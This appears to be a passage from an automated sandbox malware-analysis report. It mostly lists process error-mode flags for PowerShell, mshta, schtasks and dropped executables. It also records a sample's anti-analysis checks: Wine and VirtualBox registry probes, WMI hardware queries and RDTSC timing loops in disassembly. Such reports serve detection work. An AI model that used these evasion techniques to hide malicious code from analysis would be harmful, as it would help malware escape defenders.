                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe | Process information set: NOOPENFILEERRORBOX (12 identical rows)
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX (2 identical rows)
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Process information set: NOOPENFILEERRORBOX (2 identical rows)
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX (4 identical rows)
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (2 identical rows)
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | Process information set: NOOPENFILEERRORBOX (17 identical rows)
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
(the preceding pair of WerFault.exe rows is repeated 4 times in the original report)
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (47 identical rows)

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\random.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep (graph_0-96105)
Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
(the preceding pair of rows is repeated 2 times in the original report)
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
(the preceding pair of rows is repeated 5 times in the original report)
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4F7672 second address: 4F7678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4F7678 second address: 4F767D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4F767D second address: 4F7683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4F7683 second address: 4F769C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F29F0C52756h 0x00000008 js 00007F29F0C52756h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 jnp 00007F29F0C52756h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 50ABF0 second address: 50ABF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 50ABF8 second address: 50AC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F29F0C52764h 0x0000000a jmp 00007F29F0C52765h 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F29F0C52756h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 50AC2E second address: 50AC5B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F29F0CD5296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F29F0CD52A0h 0x00000011 push edi 0x00000012 jmp 00007F29F0CD529Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 50E900 second address: 50E91A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29F0C52766h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 50E91A second address: 50E95F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F29F0CD5296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F29F0CD5298h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D3A40h], eax 0x0000002f push 00000000h 0x00000031 mov dword ptr [ebp+122D1888h], ecx 0x00000037 push 796E8F02h 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 50E95F second address: 50E963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 50E963 second address: 50E981 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 50E981 second address: 50EA00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 xor dword ptr [esp], 796E8F82h 0x0000000d add dword ptr [ebp+122D1A3Fh], esi 0x00000013 push 00000003h 0x00000015 and edi, dword ptr [ebp+122D2A9Bh] 0x0000001b push 00000000h 0x0000001d mov edi, dword ptr [ebp+122D2ABBh] 0x00000023 jnl 00007F29F0C52772h 0x00000029 push 00000003h 0x0000002b mov si, ax 0x0000002e push DB92B47Ah 0x00000033 jmp 00007F29F0C52767h 0x00000038 xor dword ptr [esp], 1B92B47Ah 0x0000003f mov esi, 5ED73529h 0x00000044 lea ebx, dword ptr [ebp+1245F81Fh] 0x0000004a cmc 0x0000004b xchg eax, ebx 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f push ebx 0x00000050 pop ebx 0x00000051 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 50EB03 second address: 50EB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F29F0CD52AEh 0x00000015 jmp 00007F29F0CD52A8h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 50EB30 second address: 50EB41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29F0C5275Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 50EB41 second address: 50EB7E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F29F0CD5296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 js 00007F29F0CD529Eh 0x00000016 jns 00007F29F0CD5298h 0x0000001c mov eax, dword ptr [eax] 0x0000001e push edi 0x0000001f jmp 00007F29F0CD529Dh 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 js 00007F29F0CD52A4h 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 50EB7E second address: 50EB82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 50EB82 second address: 50EBBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov ch, bh 0x00000009 push 00000003h 0x0000000b jmp 00007F29F0CD52A6h 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D1B8Ch], edx 0x00000018 push 00000003h 0x0000001a add dx, B6FEh 0x0000001f push 65F1E3FFh 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 pop eax 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 50EBBD second address: 50EBC3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 50ED18 second address: 50ED1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
